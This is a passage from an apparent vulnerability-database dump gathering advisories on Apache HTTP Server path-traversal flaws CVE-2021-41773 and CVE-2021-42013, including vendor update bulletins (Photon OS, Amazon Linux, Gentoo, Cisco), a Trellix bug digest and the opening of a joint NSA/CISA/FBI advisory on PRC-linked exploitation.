\n\nApache has issued a new patch. According to the release notes for version 2.4.51\u2026\n\n> \u2026the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThe new part of the vulnerability is listed under [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). The &quot;require all denied&quot; setting blocks attacks using this vulnerability as well. Time to patch the patch.\n\nStay safe, everyone!\n\nThe post [[Updated, again] Apache fixes zero-day vulnerability in HTTP Server](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-06T14:23:08", "type": "malwarebytes", "title": "[Updated, again] Apache fixes zero-day vulnerability in HTTP Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T14:23:08", "id": "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "photon": [{"lastseen": "2022-05-12T18:54:18", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-19T00:00:00", "id": "PHSA-2021-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-10T03:16:20", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-4.0-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-20T00:00:00", "id": "PHSA-2021-4.0-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-12-17T06:19:59", "description": "On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:\n CVE-2021-41524: Null Pointer Dereference Vulnerability CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\nFor descriptions of these vulnerabilities, see the Apache Security Announcement [\"https://httpd.apache.org/security/vulnerabilities_24.html\"]. For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers [\"https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html\"].\n\nCisco investigated its product line and concluded that no Cisco products are affected by these vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:00:00", "type": "cisco", "title": "Apache HTTP Server Vulnerabilities: October 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:00:00", "id": "CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trellix": [{"lastseen": "2021-11-02T00:00:00", "description": "#### ARCHIVED STORY\n\n# The Bug Report \u2013 October Edition\n\nBy **Douglas McKee ** \u00b7 November 02, 2021\n\n## Your Cyber Security Comic Relief\n\n\n\n**Figure 1. Apache server version 2.4.50 (CVE-2021-42013)**\n\n## Why am I here?\n\nRegardless of the origins, you\u2019ve arrived at Advanced Threat Research team\u2019s monthly bug digest \u2013 an overview of what we believe to be the most noteworthy vulnerabilities over the last month. We don\u2019t rely on a single scoring system like CVSS to determine what you need to know about; this is all about qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team. We look at characteristics such as wormability, ubiquity of the target, likelihood of exploitation and impact. If you don\u2019t agree with these picks, we encourage you to write a strongly worded letter to your local senator. In lieu of that, we present our top CVEs from the last month.\n\n### Apache: CVE-2021-41773 and CVE-2021-42013\n\n**What is it?** \n2 CVES / 1 Vuln \u2013 It appears Apache struggled a bit with this latest critical vulnerability, where it took two tries to fix a basic **path traversal bug,** which was introduced while patching last month\u2019s [SSRF mod_proxy vulnerability](<https://vulners.com/cve/CVE-2021-40438>). As path traversal bugs do, this allows unauthorized users to access files outside the expected document root on the web server. But wait, there\u2019s more! This can lead **to remote code execution** provided mod-cgi is enabled on the server.\n\n**Who cares?** \nA quick Shodan scan told me there are at least 111,000 server admins that should care! With Apache being the [second largest market](<https://w3techs.com/technologies/overview/web_server>) share holder of implemented webservers, there is a good chance your organization is using it somewhere. It\u2019s always important to consider both internal and external facing assets when looking at your exposure. Apache is even commonly used as an embedded webserver to other applications and should be reviewed for use in any installed 3rd party applications. Oh yeah \u2013 and if you overlook an instance you have installed somewhere, this IS currently **being actively exploited in the wild \u2013 no pressure**.\n\n**What can I do?** \nOh! I know, use Microsoft IIS! If you\u2019re not ready to completely abandon your webserver implementation, I suggest updating to **Apache 2.4.51**. Remember to **avoid version 2.4.50** as it does not patch both vulnerabilities. If you have been an astute system admin and followed the [Apache documentation](<https://httpd.apache.org/docs/2.4/howto/access.html>) using the **default and pretty darn secure** \u201crequire all denied\u201d directive for all files outside the document root, kudos to you! Although patching is still highly recommended, you are not immediately vulnerable.\n\n**The Gold Standard** \nWe recognize in some special cases patching is harder than compiling gcc from source, so McAfee Enterprise has you covered; we have been detecting path traversal attacks in our **Network Security Platform (NSP)** like it was going out of style since 1990 (and it was).\n\n### Win32k Driver: CVE-2021-40449\n\n**What is it?** \nAin\u2019t nothin\u2019 free anymore! Except kernel module addresses on your Windows machines, thanks to Microsoft Windows [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>). This vulnerability is a use-after-free in the NtGdiResetDC function of the Win32k driver and can lead to attackers being able to **locally elevate their privileges**.\n\n**Who cares?** \nAre you currently reading this from a Microsoft Windows machine? Using Microsoft Server edition in your cloud? Local attacks are often given lower priority or downplayed. However, it is important to recognize that phishing attacks are still highly successfully as an initial point of entry, facilitating a need for privilege escalation bugs to obtain higher level access. So, unless you are a hardcore Linux and Mac-only shop, you may want to patch since this is **actively being exploited** by cybercriminals, according to our friends at [Kaspersky](<https://www.kaspersky.com/blog/mysterysnail-cve-2021-40449/42448/>).\n\n**What can I do?** \nThat boring **Microsoft patch** Tuesday thing still works, or you could just use a superior operating system like FreeBSD.\n\n**The Gold Standard** \nHave you checked out the latest version of **McAfee Enterprise ENS** lately? Detecting exploitation and cybercriminal activity is sort of its thing, assuming you have grabbed the latest signatures.\n\n### Apple iOS: CVE-2021-30883\n\n**What is it?** \nAn [integer overflow](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) vulnerability in the iOS \u201cIOMobileFrameBuffer\u201d component can allow an application to execute arbitrary code with kernel privileges. This has additionally been confirmed to be accessible from the browser.\n\n**Who cares?** \nSince Apple still [reportedly](<https://www.counterpointresearch.com/us-market-smartphone-share/>) holds 53% market share of all smartphone users, statistically speaking your organization should care too. It only takes one bad apple to hack your entire network, and with [reported](<https://support.apple.com/en-us/HT212846>) **active exploitation** in the wild it might happen sooner than you think.\n\n**What can I do?** \nYou should be sensing a common theme in this section \u2013 and, in this case, you actually can take action! Stop reading this, plug that mobile device into a power source, and install **the latest version of Apple iOS****.**\n\n**The Gold Standard** \nSince you stopped reading and updated already, congrats!\n", "cvss3": {}, "published": "2021-11-02T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 October Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30883", "CVE-2021-40438", "CVE-2021-40449", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-02T00:00:00", "id": "TRELLIX:3D1BFD2AFBB082262FACCCAE2137672E", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-october-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "amazon": [{"lastseen": "2023-02-08T17:08:50", "description": "**Issue Overview:**\n\nA NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\n\nA NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\n\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\n\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\n\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\n\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\nA path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. (CVE-2021-41773)\n\nA path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 mod24_md-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_session-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.51-1.94.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd24-manual-2.4.51-1.94.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_session-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_md-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.51-1.94.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-33193](<https://access.redhat.com/security/cve/CVE-2021-33193>), [CVE-2021-34798](<https://access.redhat.com/security/cve/CVE-2021-34798>), [CVE-2021-36160](<https://access.redhat.com/security/cve/CVE-2021-36160>), [CVE-2021-39275](<https://access.redhat.com/security/cve/CVE-2021-39275>), [CVE-2021-40438](<https://access.redhat.com/security/cve/CVE-2021-40438>), [CVE-2021-41524](<https://access.redhat.com/security/cve/CVE-2021-41524>), [CVE-2021-41773](<https://access.redhat.com/security/cve/CVE-2021-41773>), [CVE-2021-42013](<https://access.redhat.com/security/cve/CVE-2021-42013>)\n\nMitre: [CVE-2021-33193](<https://vulners.com/cve/CVE-2021-33193>), [CVE-2021-34798](<https://vulners.com/cve/CVE-2021-34798>), [CVE-2021-36160](<https://vulners.com/cve/CVE-2021-36160>), [CVE-2021-39275](<https://vulners.com/cve/CVE-2021-39275>), [CVE-2021-40438](<https://vulners.com/cve/CVE-2021-40438>), [CVE-2021-41524](<https://vulners.com/cve/CVE-2021-41524>), [CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>), [CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T07:52:00", "type": "amazon", "title": "Important: httpd24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T15:02:00", "id": "ALAS-2021-1543", "href": "https://alas.aws.amazon.com/ALAS-2021-1543.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T17:31:40", "description": "**Issue Overview:**\n\nA NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\n\nA NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\n\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\n\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\n\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\n\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\nA path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. (CVE-2021-41773)\n\nA path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd-manual-2.4.51-1.amzn2.noarch \n \u00a0\u00a0\u00a0 httpd-filesystem-2.4.51-1.amzn2.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.src \n \n x86_64: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-33193](<https://access.redhat.com/security/cve/CVE-2021-33193>), [CVE-2021-34798](<https://access.redhat.com/security/cve/CVE-2021-34798>), [CVE-2021-36160](<https://access.redhat.com/security/cve/CVE-2021-36160>), [CVE-2021-39275](<https://access.redhat.com/security/cve/CVE-2021-39275>), [CVE-2021-40438](<https://access.redhat.com/security/cve/CVE-2021-40438>), [CVE-2021-41524](<https://access.redhat.com/security/cve/CVE-2021-41524>), [CVE-2021-41773](<https://access.redhat.com/security/cve/CVE-2021-41773>), [CVE-2021-42013](<https://access.redhat.com/security/cve/CVE-2021-42013>)\n\nMitre: [CVE-2021-33193](<https://vulners.com/cve/CVE-2021-33193>), [CVE-2021-34798](<https://vulners.com/cve/CVE-2021-34798>), [CVE-2021-36160](<https://vulners.com/cve/CVE-2021-36160>), [CVE-2021-39275](<https://vulners.com/cve/CVE-2021-39275>), [CVE-2021-40438](<https://vulners.com/cve/CVE-2021-40438>), [CVE-2021-41524](<https://vulners.com/cve/CVE-2021-41524>), [CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>), [CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T07:57:00", "type": "amazon", "title": "Important: httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T15:04:00", "id": "ALAS2-2021-1716", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1716.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-08-14T00:22:35", "description": "### Background\n\nThe Apache HTTP server is one of the most popular web servers on the Internet.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache HTTPD. Please review the CVE identifiers referenced below for details.\n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache HTTPD users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.4.54\"\n \n\nAll Apache HTTPD tools users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/apache-tools-2.4.54\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-14T00:00:00", "type": "gentoo", "title": "Apache HTTPD: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-44224", "CVE-2021-44790", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-23943", "CVE-2022-26377", "CVE-2022-28614", "CVE-2022-28615", "CVE-2022-29404", "CVE-2022-30522", "CVE-2022-30556", "CVE-2022-31813"], "modified": "2022-08-14T00:00:00", "id": "GLSA-202208-20", "href": "https://security.gentoo.org/glsa/202208-20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-03-14T18:24:52", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories &amp; Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known 